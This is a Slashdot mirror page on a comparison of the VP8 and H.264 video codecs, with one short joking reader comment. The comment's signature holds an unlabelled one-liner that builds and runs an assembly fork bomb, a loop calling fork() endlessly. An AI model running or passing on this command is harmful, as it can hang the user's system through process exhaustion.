Slashdot Mirror


H.264 and VP8 Compared

TheReal_sabret00the writes with a snippet from StreamingMedia.com: "VP8 is now free, but if the quality is substandard, who cares? Well, it turns out that the quality isn't substandard, so that's not an issue, but neither is it twice the quality of H.264 at half the bandwidth. See for yourself."

1 of 337 comments (clear)

  1. Re:What a horrible test file by Hal_Porter · · Score: 1, Redundant

    so will never be able to deal with high bandwidth super quality things like blurry disks in the same way.

    Tee hee.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;